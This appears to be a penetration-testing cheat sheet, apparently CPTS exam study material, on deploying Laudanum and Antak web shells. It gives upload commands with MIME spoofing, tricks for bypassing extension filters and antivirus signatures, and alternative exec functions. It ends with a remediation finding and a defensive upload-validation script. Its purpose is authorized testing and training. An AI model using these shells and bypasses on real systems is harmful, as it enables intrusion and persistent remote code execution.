Methodology Checklist
- Identify web server language (PHP, ASPX, JSP)
- Copy Laudanum shell: `/usr/share/webshells/laudanum/`
- Upload shell via file upload vulnerability or write path
- Access shell at uploaded URL
- Laudanum: interactive command execution in browser
- Antak (ASPX): PowerShell web shell for Windows IIS
- Clean up web shell after engagement
Operational Context
Use when: You have file write to a web root (via LFI, unrestricted upload, or RCE) and need a feature-rich persistent web shell.
Think Dumber First: Laudanum PHP web shell is in /usr/share/webshells/laudanum/ on Kali. Upload php/shell.php via file upload vuln. Access at http://[TARGET]/uploads/shell.php. Antak is ASP.NET variant for IIS targets; check for .aspx support first.
Skip when: Simple PHP one-liner is sufficient; avoid overhead of feature-rich shells that have more detection surface.
Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| `ls /usr/share/laudanum/` | List Laudanum shell templates (ASP, ASPX, JSP, PHP) |
| `cp /usr/share/laudanum/aspx/shell.aspx /home/tester/demo.aspx` | Copy Laudanum shell to working dir |
| `cp /usr/share/nishang/Antak-WebShell/antak.aspx /home/attacker/upload.aspx` | Copy Antak shell to working dir |
| `nano demo.aspx` | Edit Laudanum: add attacker IP to allowedIps array (line ~60) |
| `nano upload.aspx` | Edit Antak: set username/password credentials (line ~14) |
| `curl -X POST -F "file=@shell.aspx;type=image/png" http://[DOMAIN]/upload.php` | Upload with MIME type spoofing |
Deep Dive & Workflow
Laudanum: Pre-Made Web Shells
Pre-built injectable files for ASP, ASPX, JSP, PHP. Installed by default on Kali/Parrot.
Path: /usr/share/laudanum/
Workflow:
```bash
# 1. Copy (never edit originals)
cp /usr/share/laudanum/aspx/shell.aspx ./demo.aspx
# 2. Configure: find allowedIps (~line 60) and add your tun0 IP
# string[] allowedIps = new string[] { "127.0.0.1", "::1", "10.10.14.x" };
# 3. AV bypass: remove ASCII art and comments at top of file
# (These are signatured by Windows Defender / WAFs)
# 4. Upload via target's vulnerable upload function
# 5. Access via browser
# http://[TARGET]/files/demo.aspx
```
CPTS Exam Tips:
- If you get 403 Forbidden: you forgot to add your VPN IP to `allowedIps`
- Windows paths use `\` but URLs use `/`; convert when building the access URL
- Verify you're using ASP vs ASPX based on what IIS is running
Antak: PowerShell Web Console (ASPX)
Part of the Nishang framework. Acts as a PowerShell terminal in the browser. Target: Windows IIS.
Path: /usr/share/nishang/Antak-WebShell/
Workflow:
```bash
# 1. Copy to workspace
cp /usr/share/nishang/Antak-WebShell/antak.aspx ./upload.aspx
# 2. Set credentials (line ~14)
# string User = "admin";
# string Pass = "p4ssw0rd";
# 3. Remove ASCII art and comments (AV bypass)
# 4. Upload to target
# 5. Access via browser; you'll see a login prompt
# http://[TARGET]/files/upload.aspx
# 6. Execute PowerShell commands in white input box (below blue read-only output box)
```
Antak Limitations:
- Commands run as new processes; no persistent `cd` between executions
- Chain commands: `cd C:\Users; Get-ChildItem`
- Blue box is read-only output; type in white box below it
- If input box is missing: browser rendering issue; use Laudanum instead
Web Shell Comparison
| Shell | Language | Target OS | Auth | Interface |
|---|---|---|---|---|
| Laudanum (aspx) | ASPX | Windows IIS | IP whitelist | Command input box |
| Laudanum (php) | PHP | Linux/Apache | IP whitelist | Command input box |
| Antak | ASPX | Windows IIS | Username/Password | PowerShell console UI |
Common OPSEC Failures
- Uploading without editing `allowedIps`: gets caught/blocked
- Leaving ASCII art / author comments: AV signature match
- Not recording upload path and filename: can't find shell later or clean up
- Using web shell as permanent access: convert to reverse shell ASAP then remove web shell
Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Laudanum shell blocked by WAF | Signature match on known shell | Modify PHP shell: rename functions, add random comments, change variable names |
| Antak ASPX shell returns 500 | .NET version mismatch | Check target .NET version; ensure `<%@ Page Language="C#" %>` matches available runtime |
| Shell accessible but no command output | Disabled functions | Check `phpinfo()` for `disable_functions`; try alternatives: `shell_exec`, `passthru`, `proc_open` |
| File upload rejected | MIME type or extension filter | Rename to `.php5`, `.phtml`, `.phar`; change Content-Type to `image/jpeg` in Burp |
| Web shell returns blank page | Output buffering | Add `ob_flush(); flush();` after command execution in PHP shell |
Reporting Trigger
Finding Title: Web Shell Deployed via Unrestricted File Upload
Impact: Attacker-controlled web shell provides persistent RCE on the web server, enabling lateral movement, credential theft, and ongoing access independent of the initial vulnerability.
Root Cause: File upload functionality permits server-side executable files without validation of content type, extension, or file content.
Recommendation: Implement strict file upload validation: allowlist extensions, verify MIME type against content, rename uploaded files, store outside web root. Deploy WAF with web shell detection rules. Monitor for new .php/.aspx files in upload directories.
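A sketch of the upload controls named in the Recommendation, for use in the remediation section of a report. This is an added example, not code from Laudanum, Nishang or any target application; `validate_upload`, `find_server_side_files` and the allowlist contents are illustrative assumptions.

```python
import os
import secrets

# Added example: function names and allowlist entries are illustrative assumptions.
# Allowlisted extension -> (required Content-Type, magic bytes the content must start with).
ALLOWED = {
    ".png": ("image/png", b"\x89PNG\r\n\x1a\n"),
    ".jpg": ("image/jpeg", b"\xff\xd8\xff"),
    ".jpeg": ("image/jpeg", b"\xff\xd8\xff"),
    ".gif": ("image/gif", b"GIF8"),
    ".pdf": ("application/pdf", b"%PDF-"),
}

# Extensions a web server may execute; used only by the upload-directory monitor.
SERVER_SIDE = {".php", ".php5", ".phtml", ".phar", ".asp", ".aspx", ".jsp"}


class UploadRejected(Exception):
    pass


def validate_upload(client_name, declared_type, data):
    """Return a server-generated storage name, or raise UploadRejected."""
    base = os.path.basename(client_name.replace("\\", "/"))
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED:
        raise UploadRejected(f"extension {ext or '(none)'} not allowlisted")
    expected_type, magic = ALLOWED[ext]
    if declared_type != expected_type:
        raise UploadRejected("declared Content-Type does not match extension")
    if not data.startswith(magic):
        raise UploadRejected("content does not match declared type")
    # Never reuse the client's name; the caller stores this outside the web root.
    return secrets.token_hex(16) + ext


def find_server_side_files(upload_dir):
    """Monitoring pass: list files in upload_dir with executable extensions."""
    hits = []
    for root, _dirs, files in os.walk(upload_dir):
        for name in files:
            if os.path.splitext(name)[1].lower() in SERVER_SIDE:
                hits.append(os.path.join(root, name))
    return sorted(hits)
```

A magic-byte check does not stop a file that is both a valid image and a script, so the random rename and storage outside the web root remain necessary alongside it.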